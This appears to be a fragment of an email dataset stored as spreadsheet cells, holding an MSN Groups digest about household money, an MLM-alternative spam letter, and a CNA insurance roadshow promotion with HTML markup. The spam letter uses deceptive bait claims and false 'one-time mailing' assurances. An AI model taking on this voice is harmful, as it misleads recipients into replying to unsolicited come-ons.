                &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
                &lt;TD align=3Dleft width=3D100%&gt;&lt;FONT size=3D"1"&gt;
 		          &lt;A =
 href=3D"mailto:abcusa88@hotmail.com?subject=3DRe%3A%20Hi%21%20I%27m%20new=
 %20here%2E" title=3D"Send a reply to the sender of this message."&gt;&lt;FONT =
 face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Reply to Sender&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 		          &amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Drecommend&amp;parent=3D1&amp;item=3D1405" title=3D"Increase the =
 number of recommendations for this message."&gt;&lt;IMG align=3Dmiddle =
 border=3D0 height=3D16 hspace=3D3 width=3D16 =
 src=3Dhttp://sc.communities.msn.com/themes/pby/img/mb/recommend.gif&gt;&lt;FONT=
  face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Recommend&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 			      &lt;/TD&gt;
                   &lt;TD align=3Dright nowrap&gt;&lt;FONT size=3D"1"&gt;Message 6 in =
 Discussion&lt;/FONT&gt;
                &lt;/TD&gt;                                =20
 		    &lt;/TR&gt;
 		  &lt;/TABLE&gt;
         &lt;/TD&gt;
       &lt;/TR&gt;&lt;TR&gt;        	   =20
         &lt;TD colspan=3D2&gt;&lt;TABLE border=3D0 cellpadding=3D4 =
 cellspacing=3D0 width=3D100%&gt;
 		    &lt;TR&gt;&lt;TD class=3DThmBgHighlightLight&gt;
 		      &lt;FONT face=3D"Arial, Helvetica, Sans Serif" =
 class=3DThmFgInactiveText size=3D"2"&gt;From: &lt;/FONT&gt;
 			  &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/profile?user=3Djoyful" =
 title=3D"View Member Information of sender."&gt;&lt;FONT face=3D"Arial, =
 Helvetica, Sans Serif" class=3DThmFgMiscText =
 size=3D"2"&gt;joyful&lt;/FONT&gt;&lt;/A&gt;
 			&lt;/TD&gt;&lt;/TR&gt;
 			&lt;TR&gt;&lt;TD class=3DThmBgStandard&gt;
 			  &lt;BR&gt;
               &lt;DIV&gt;Thank you! I'll be very careful as to choose where to =
 invest. I invest in college fund bound every month. But it is going =
 downhill . We opened the account in February. It has never gained any =
 value ever since. I don't know much about investment. I hate to see this =
 happened.&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
 		  &lt;/TABLE&gt;
 		&lt;/TD&gt;
       &lt;/TR&gt;
           &lt;/TABLE&gt;
   &lt;BR&gt;
     &lt;A href=3D"http://groups.msn.com/Browse?CatId=3D134"&gt;View other =
 groups in this category.&lt;/A&gt;
   &lt;BR&gt;
   &lt;BR&gt;
       &lt;!--WSSTRIPPABLEBEGIN--&gt;
     &lt;a =
 href=3D"http://g.msn.com/0ADW/136212.1??UIT=3D&amp;amp;TargetID=3D31706&amp;amp;C=
 txID=3D2&amp;amp;PID=3D308636&amp;amp;AN=3D26405" target=3D"_top"&gt;&lt;img =
 src=3D"http://global.msads.net/ads/WBCMON/002111790010_LG.gif" =
 alt=3D"Click Here!" height=3D"60" width=3D"468" border=3D"0" &gt;&lt;/a&gt;    =
 &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;&lt;P&gt;&lt;STYLE&gt;&lt;!--
 ADMSmLnk{font-family:verdana,system;color:#336699;text-decoration:none;}
 ADMSmLnk:hover{color:#ff6600;text-decoration:underline;}
 --&gt;&lt;/STYLE&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D500 border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face=3Dverdana color=3D#333366 size=3D1&gt;&lt;B&gt;Also on =
 MSN:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_01"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Start Chatting&lt;/FONT&gt;&lt;/A&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_02"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Listen to Music&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_03"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;House &amp;amp; Home&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_04"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Try Online =
 Dating&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana color=3D#336699 =
 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT face=3Dverdana color=3D#333366 =
 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_05"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Daily Horoscopes&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;&lt;/FONT&gt;=20
 &lt;TD&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;!--WSSTRIPPABLEEND--&gt;&lt;/BLOCKQUOTE&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;
 &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D"100%"&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD width=3D"100%" height=3D"1""&gt;&lt;img =
 border=3D"0" src=3D"http://sc.communities.msn.com/img/c.gif" =
 width=3D"100%" height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%" class=3DThmBgAlternate&gt;
       &lt;BLOCKQUOTE&gt;
       &lt;FONT face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgStandard =
 size=3D"1"&gt;
         &lt;BR&gt;
                   To stop getting this e-mail, or change how often it =
 arrives, go to your &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;E-mail Settings&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;&lt;BR&gt;
 		                  Need help? If you've forgotten your password, please =
 go to &lt;A =
 href=3D"http://groups.msn.com/_passportredir.msnw?ppmprop=3Dhelp"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Passport Member Services&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;
 		                  For other questions or feedback, go to our &lt;A =
 href=3D"http://groups.msn.com/contact"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Contact Us&lt;/FONT&gt;&lt;/A&gt; page.          &lt;BR&gt;&lt;BR&gt;
 		                  If you do not want to receive future e-mail from =
 this MSN group, or if you received this message by mistake, please click =
 the "Remove" link below. On the pre-addressed e-mail message that opens, =
 simply click "Send". Your e-mail address will be deleted from this =
 group's mailing list.
           &lt;BR&gt;
             &lt;A href=3D"mailto:OneIncomeLiving-remove@groups.msn.com" =
 title=3D"Send a request to have your e-mail removed from this =
 group."&gt;&lt;FONT class=3DThmFgMiscText&gt;Remove my e-mail address from One =
 Income Living.&lt;/FONT&gt;&lt;/A&gt;
 		      &lt;/BLOCKQUOTE&gt;
     &lt;/TD&gt;
   &lt;/TD&gt;
 &lt;/TABLE&gt;
 &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_000_FC527_01C23FE0.9AFE81B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: An alternative to MLM that WORKS
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings! 
 You are receiving this letter because you have expressed an interest in
 receiving information about online business opportunities. If this is
 erroneous then please accept my most sincere apology. This is a one-time
 mailing, so no removal is necessary. 
 If you've been burned, betrayed, and back-stabbed by multi-level
 marketing, MLM, then please read this letter. It could be the most
 important one that has ever landed in your Inbox. 
 MULTI-LEVEL MARKETING IS A HUGE MISTAKE FOR MOST PEOPLE 
 MLM has failed to deliver on its promises for the past 50 years. The
 pursuit of the "MLM Dream" has cost hundreds of thousands of people their
 friends, their fortunes and their sacred honor. The fact is that MLM is
 fatally flawed, meaning that it CANNOT work for most people. 
 The companies and the few who earn the big money in MLM are NOT going to
 tell you the real story. FINALLY, there is someone who has the courage to
 cut through the hype and lies and tell the TRUTH about MLM. 
 HERE'S GOOD NEWS 
 There IS an alternative to MLM that WORKS, and works BIG! If you haven't
 yet abandoned your dreams, then you need to see this. Earning the kind of
 income you've dreamed about is easier than you think! 
 With your permission, I'd like to send you a brief letter that will tell
 you WHY MLM doesn't work for most people and will then introduce you to
 something so new and refreshing that you'll wonder why you haven't heard
 of this before. 
 I promise that there will be NO unwanted follow up, NO sales pitch, no one
 will call you, and your email address will only be used to send you the
 information. Period. 
 To receive this free, life-changing information, simply click Reply, type
 "Send Info" in the Subject box and hit Send. I'll get the information to
 you within 24 hours. Just look for the words MLM WALL OF SHAME in your
 Inbox. 
 Cordially, 
 Looking4Money 
 P.S. Someone recently sent the letter to me and it has been the most
 eye-opening, financially beneficial information I have ever received. I
 honestly believe that you will feel the same way once you've read it. And
 it's FREE! 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hit the Road with CNA
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_43A60B_01C26E20.8F5BC480
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  What does it mean to be made in the USA?
  CNA is hitting the road to tell you about ingenuity, innovative
 products and gutsy spirit.	
 We encourage you to attend the CNA American Road
 Show. You'll get an insider's glimpse of CNA's new products:
 a revolutionary long-term care, an innovative annuity and a
 ground-breaking new CNA term that'll dominate the market.
 CNA management will also share profitable ideas, discuss
 service and distribution strategies and unveil exciting
 incentive programs.
 8:00 a.m. ? Coffee and rolls
 8:15 a.m.-12:00 p.m. ? Road Show presentations
 Oct. 8 New Orleans, LA
 Hilton New Orleans Airport 
 901 Airline Drive ? Kenner, LA
 Oct. 9 Houston, TX
 Marriott Houston Bush IAH
 18700 John F. Kennedy Blvd.
 Oct. 10 Dallas, TX
 Marriott Suites Dallas Market Center 
 2493 N. Stemmons Fwy.
 Oct. 16 Pittsburgh, PA
 Pittsburgh Marriott City Center
 112 Washington Place
 Oct. 18 Baltimore, MD
 BWI Airport Marriott 
 1743 West Nursery Rd.
 Oct. 22 Chicago, IL
 Marriott Chicago O?Hare
 8538 West Higgins Rd.
 Oct. 23 Seattle, WA
 Doubletree Hotel Seattle Airport
 18740 Pacific Hwy. South
 Oct. 24 Salt Lake City, UT
 Hilton Salt Lake City Airport
 5151 Wiley Post Way 
 Oct. 25 Phoenix, AZ
 Embassy Suites Phoenix 
 Airport
 1515 N. 44th Street
 Oct. 28 Nashville, TN
 Sheraton Music City 
 777 McGavock Pike
 Oct. 29 Kansas City, MO
 Embassy Suites KCI 
 7640 NW Tiffany Springs Pkwy.
 Oct. 30 St. Louis, MO
 Marriott St. Louis Airport
 I-70 at Lambert Airport
 Oct. 31 Minneapolis, MN
 Marriott Minneapolis Airport
 2020 East 79th Street
 Nov. 6 Charlotte, NC
 Renaissance Charlotte 
 Suites Hotel
 2800 Coliseum Centre Drive
 Nov. 8 Hartford, CT
 Hartford/Windsor Marriott 
 Airport 
 28 Day Hill Road ? Windsor, CT 
 Nov. 11 Los Angeles, CA
 Marriott Warner Center 
 21850 Oxnard St.
 Woodland Hills
 Nov. 12 Orange County, CA
 Marriott Irvine John Wayne Airport
 8538 West Higgins Rd.
 18000 VonKarman Ave.
 Nov. 13 San Diego, CA
 Marriott San Diego Mission Valley 
 8757 San Diego Drive
 Nov. 14 San Francisco, CA
 Santa Clara Marriott 
 2700 Mission College Blvd.
 Santa Clara
 Nov. 15 Sacramento, CA
 Marriott Sacramento 
 11211 Point East Drive 
 Rancho Cordova, CA
 Nov. 19 Atlanta, GA
 Marriott Atlanta Northwest 
 200 Interstate North Parkway
 Nov. 20 Tampa, FL
 Hilton Garden Inn Tampa North 
 600 Tampa Oaks Blvd. 
 	The CNA American Road Show is the must-attend meeting of the
 year.
 	Visit http://agents.cnalife.com for more information.
 ? OR ? 	
  	 Please fill out the form below for more information	 
 Name:	 	 
 E-mail:	 	 
 Phone:	 	 
 City:	 	 State:	 	  	
  	CNA, CNA Life and CNA LTC are registered service marks, trade
 names and domain names of CNA Financial Corporation. CNA life insurance
 and annuity products are underwritten by Valley Forge Life Insurance
 Company and, in New York, Continental Assurance Company. CNA long-term
 care products are underwritten by Continental Casualty Company and
 Valley Forge Life Insurance Company. All products and their features may
 not be available in all states.
 MX3229 9/02 http://agents.cnalife.com FOR PRODUCER USE ONLY
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  	
 ------=_NextPart_000_43A60B_01C26E20.8F5BC480
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Hit the Road with CNA&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;=20
   &lt;table width=3D"550" border=3D"3" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#CC3333"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/cna/top.jpg" =
 width=3D"550" height=3D"107" alt=3D'What does it mean to be made in the =
 USA?'&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/cna/bot.jpg" width=3D"550" =
 height=3D"153" alt=3D'CNA is hitting the road to tell you about =
 ingenuity, innovative products and gutsy spirit.'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;=20
                 &lt;table width=3D"377" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0" height=3D"40"&gt;
                   &lt;tr&gt;=20
                     &lt;td&gt;=20
                       &lt;p&gt;&lt;font size=3D"2" face=3D"Geneva, Arial, =
 Helvetica, san-serif" color=3D"#CC3333"&gt;
                         We encourage you to attend the &lt;b&gt;&lt;font =
 color=3D"#003399"&gt;CNA American Road&lt;br&gt;
                         Show.&lt;/font&gt;&lt;/b&gt; You'll get an insider's glimpse =
 of CNA's new products:&lt;br&gt;
                         a &lt;b&gt;&lt;font color=3D"#003399"&gt;revolutionary =
 long-term care, an innovative annuity&lt;/font&gt;&lt;/b&gt; and a&lt;br&gt;
                         ground-breaking &lt;font color=3D"#003399"&gt;&lt;b&gt;new =
 CNA term&lt;/b&gt;&lt;/font&gt; that'll dominate the market.&lt;br&gt;
                         CNA management will also share profitable ideas, =
 discuss&lt;br&gt;
                         service and distribution strategies and unveil =
 exciting&lt;br&gt;
                         incentive programs.&lt;/font&gt;&lt;/p&gt;
                       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                         8:00 a.m. &amp;#150; Coffee and rolls&lt;br&gt;
                         8:15 a.m.-12:00 p.m. &amp;#150; Road Show =
 presentations&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;&lt;br&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"9"&gt;
           &lt;tr valign=3D"top"&gt;=20
             &lt;td width=3D"183"&gt;=20
               &lt;font size=3D"1" face=3D"Geneva, Arial, Helvetica, =
 san-serif"&gt;
               &lt;p&gt;Oct. 8 &lt;font color=3D"#CC3333"&gt;New Orleans, =
 LA&lt;/font&gt;&lt;br&gt;
                 Hilton New Orleans Airport &lt;br&gt;
                 901 Airline Drive &amp;#150; Kenner, LA&lt;/p&gt;
               &lt;p&gt;Oct. 9 &lt;font color=3D"#CC3333"&gt;Houston, TX&lt;/font&gt;&lt;br&gt;
                 Marriott Houston Bush IAH&lt;br&gt;
                 18700 John F. Kennedy Blvd.&lt;/p&gt;
               &lt;p&gt;Oct. 10 &lt;font color=3D"#CC3333"&gt;Dallas, TX&lt;/font&gt;&lt;br&gt;
                 Marriott Suites Dallas Market Center &lt;br&gt;
                 2493 N. Stemmons Fwy.&lt;/p&gt;
               &lt;p&gt;Oct. 16 &lt;font color=3D"#CC3333"&gt;Pittsburgh, =
 PA&lt;/font&gt;&lt;br&gt;
                 Pittsburgh Marriott City Center&lt;br&gt;
                 112 Washington Place&lt;/p&gt;
               &lt;p&gt;Oct. 18 &lt;font color=3D"#CC3333"&gt; Baltimore, =
 MD&lt;/font&gt;&lt;br&gt;
                 BWI Airport Marriott &lt;br&gt;
                 1743 West Nursery Rd.&lt;/p&gt;
               &lt;p&gt;Oct. 22 &lt;font color=3D"#CC3333"&gt;Chicago, IL&lt;/font&gt;&lt;br&gt;
                 Marriott Chicago O&amp;#146;Hare&lt;br&gt;
                 8538 West Higgins Rd.&lt;/p&gt;
               &lt;p&gt;Oct. 23 &lt;font color=3D"#CC3333"&gt;Seattle, WA&lt;/font&gt;&lt;br&gt;
                 Doubletree Hotel Seattle Airport&lt;br&gt;
                 18740 Pacific Hwy. South&lt;/p&gt;
               &lt;p&gt;Oct. 24 &lt;font color=3D"#CC3333"&gt;Salt Lake City, =
 UT&lt;/font&gt;&lt;br&gt;
                 Hilton Salt Lake City Airport&lt;br&gt;
                 5151 Wiley Post Way &lt;/p&gt;
               &lt;/font&gt;
             &lt;/td&gt;
             &lt;td width=3D"180"&gt;=20
               &lt;font size=3D"1" face=3D"Geneva, Arial, Helvetica, =
 san-serif"&gt;
               &lt;p&gt;Oct. 25&lt;font color=3D"#CC3333"&gt; Phoenix, AZ&lt;/font&gt;&lt;br&gt;
                 Embassy Suites Phoenix &lt;br&gt;
                 Airport&lt;br&gt;
                 1515 N. 44th Street&lt;/p&gt;
               &lt;p&gt;Oct. 28 &lt;font color=3D"#CC3333"&gt;Nashville, =
 TN&lt;/font&gt;&lt;br&gt;
                 Sheraton Music City &lt;br&gt;
                 777 McGavock Pike&lt;/p&gt;
               &lt;p&gt;Oct. 29 &lt;font color=3D"#CC3333"&gt;Kansas City, =
 MO&lt;/font&gt;&lt;br&gt;
                 Embassy Suites KCI &lt;br&gt;
                 7640 NW Tiffany Springs Pkwy.&lt;/p&gt;
               &lt;p&gt;Oct. 30 &lt;font color=3D"#CC3333"&gt;St. Louis, =
 MO&lt;/font&gt;&lt;br&gt;
                 Marriott St. Louis Airport&lt;br&gt;
                 I-70 at Lambert Airport&lt;/p&gt;
               &lt;p&gt;Oct. 31 &lt;font color=3D"#CC3333"&gt;Minneapolis, =
 MN&lt;/font&gt;&lt;br&gt;
                 Marriott Minneapolis Airport&lt;br&gt;
                 2020 East 79th Street&lt;/p&gt;
               &lt;p&gt;Nov. 6 &lt;font color=3D"#CC3333"&gt;Charlotte, NC&lt;/font&gt;&lt;br&gt;
                 Renaissance Charlotte &lt;br&gt;
                 Suites Hotel&lt;br&gt;
                 2800 Coliseum Centre Drive&lt;/p&gt;
               &lt;p&gt;Nov. 8 &lt;font color=3D"#CC3333"&gt;Hartford, CT&lt;/font&gt;&lt;br&gt;
                 Hartford/Windsor Marriott &lt;br&gt;
                 Airport &lt;br&gt;
                 28 Day Hill Road &amp;#150; Windsor, CT &lt;/p&gt;
               &lt;/font&gt;
             &lt;/td&gt;
             &lt;td width=3D"187"&gt;=20
               &lt;font size=3D"1" face=3D"Geneva, Arial, Helvetica, =
 san-serif"&gt;
               &lt;p&gt;Nov. 11 &lt;font color=3D"#CC3333"&gt;Los Angeles, =
 CA&lt;/font&gt;&lt;br&gt;
                 Marriott Warner Center &lt;br&gt;
                 21850 Oxnard St.&lt;br&gt;
                 Woodland Hills&lt;/p&gt;
               &lt;p&gt;Nov. 12 &lt;font color=3D"#CC3333"&gt;Orange County, =
 CA&lt;/font&gt;&lt;br&gt;
                 Marriott Irvine John Wayne Airport&lt;br&gt;
                 8538 West Higgins Rd.&lt;br&gt;
                 18000 VonKarman Ave.&lt;/p&gt;
               &lt;p&gt;Nov. 13 &lt;font color=3D"#CC3333"&gt;San Diego, =
 CA&lt;/font&gt;&lt;br&gt;
                 Marriott San Diego Mission Valley &lt;br&gt;
                 8757 San Diego Drive&lt;/p&gt;
               &lt;p&gt;Nov. 14 &lt;font color=3D"#CC3333"&gt;San Francisco, =
 CA&lt;/font&gt;&lt;br&gt;
                 Santa Clara Marriott &lt;br&gt;
                 2700 Mission College Blvd.&lt;br&gt;
                 Santa Clara&lt;/p&gt;
               &lt;p&gt;Nov. 15&lt;font color=3D"#CC3333"&gt; Sacramento, =
 CA&lt;/font&gt;&lt;br&gt;
                 Marriott Sacramento &lt;br&gt;
                 11211 Point East Drive &lt;br&gt;
                 Rancho Cordova, CA&lt;/p&gt;
               &lt;p&gt;Nov. 19 &lt;font color=3D"#CC3333"&gt;Atlanta, GA&lt;/font&gt;&lt;br&gt;
                 Marriott Atlanta Northwest &lt;br&gt;
                 200 Interstate North Parkway&lt;/p&gt;
               &lt;p&gt;Nov. 20 &lt;font color=3D"#CC3333"&gt;Tampa, FL&lt;/font&gt;&lt;br&gt;
                 Hilton Garden Inn Tampa North &lt;br&gt;
                 600 Tampa Oaks Blvd. &lt;/p&gt;
               &lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"6"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;blockquote&gt;=20
                 &lt;p&gt;&lt;font face=3D"Geneva, Arial, Helvetica, san-serif" =
 size=3D"2" color=3D"#CC3333"&gt;&lt;b&gt;
                   The CNA American Road Show is the must-attend meeting =
 of the year.&lt;br&gt;
                   Visit &lt;a =
 href=3D"http://agents.cnalife.com"&gt;http://agents.cnalife.com&lt;/a&gt;=20
                   for more information.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;/blockquote&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;
               &lt;font face=3D"Geneva, Arial, Helvetica, san-serif" =
 size=3D"2" color=3D"#CC3333"&gt;&lt;b&gt;&amp;#151; OR &amp;#151;&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%" bgcolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#CC3333"&gt;&lt;b&gt;Please fill out =
 the form below for more information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#CC3333"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#CC3333"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#CC3333"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#CC3333"&gt;City:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#CC3333"&gt;State:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                           &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;font color=3D"#CC3333"&gt;&lt;img =
 src=3D"http://iiq.us/images/q2.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                           &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                             &lt;input type=3D"submit" name=3D"submit" =
 value=3D"Submit"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"roadshow@cnalife.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"CNA Ad Inquiry"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"73"&gt;&lt;img =
 src=3D"http://iiq.us/images/cna/logo.gif" width=3D"63" =
 height=3D"63"&gt;&lt;/td&gt;
             &lt;td width=3D"461"&gt;&lt;font face=3D"Geneva, Arial, Helvetica, =
 san-serif" size=3D"1"&gt;CNA,=20
               CNA Life and CNA LTC are registered service marks, trade =
 names and=20
               domain names of CNA Financial Corporation. CNA life =
 insurance and=20
               annuity products are underwritten by Valley Forge Life =
 Insurance=20
               Company and, in New York, Continental Assurance Company. =
 CNA long-term=20
               care products are underwritten by Continental Casualty =
 Company and=20
               Valley Forge Life Insurance Company. All products and =
 their features=20
               may not be available in all states.&lt;br&gt;
               MX3229 9/02 http://agents.cnalife.com FOR PRODUCER USE =
 ONLY&lt;br&gt;
               We don't want anybody to receive our mailing who does not =
 wish to=20
               receive them. This is a professional communication sent to =
 insurance=20
               professionals. To be removed from this mailing list, DO =
 NOT REPLY=20
               to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout"&gt;http://www.insuranceiq.com/opt=
 out&lt;/a&gt;&lt;br&gt;
               &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
